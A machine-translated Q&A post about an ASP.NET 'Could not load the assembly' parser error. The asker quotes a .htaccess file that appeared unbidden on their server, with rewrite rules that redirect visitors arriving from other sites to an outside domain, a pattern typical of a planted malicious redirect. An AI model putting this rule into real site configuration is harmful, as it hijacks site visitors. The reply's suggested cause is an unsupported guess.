该网站自2个月以来工作正常,现在显示错误:
Server Error in '/' Application.
Parser Error
Description: An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately.
Parser Error Message: Could not load the assembly 'App_Web_ir1tlux4'. Make sure that it is compiled before accessing the page.
Line 1: <%@ page title="MIS for Cattle & Buffalo - Home" language="C#" masterpagefile="~/MainMaster.master" autoeventwireup="true" inherits="index, App_Web_ir1tlux4" %>
奇怪的是,如果我重新上载一个新发布的版本,该网站将会 工作正常1/2小时然后再次显示上述错误。
请帮忙
我在web.config文件和其他文件中尝试了不同的修改 有关类似主题的关于forums.asp.net的建议,但似乎没有什么对我有用
具有以下内容的文件.htaccess仅出现在我认为添加此文件时的FTP中 托管公司服务器,然后问题就开始了:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://travlor.com/acgu.html [L,R]
</IfModule>
答案 0 :(得分:0)
我没有做任何新的事情,而且修复了 我认为托管服务器的IIS必须更改一些设置 我的网站文件夹被添加为应用程序。
所以没有任何事情可以解决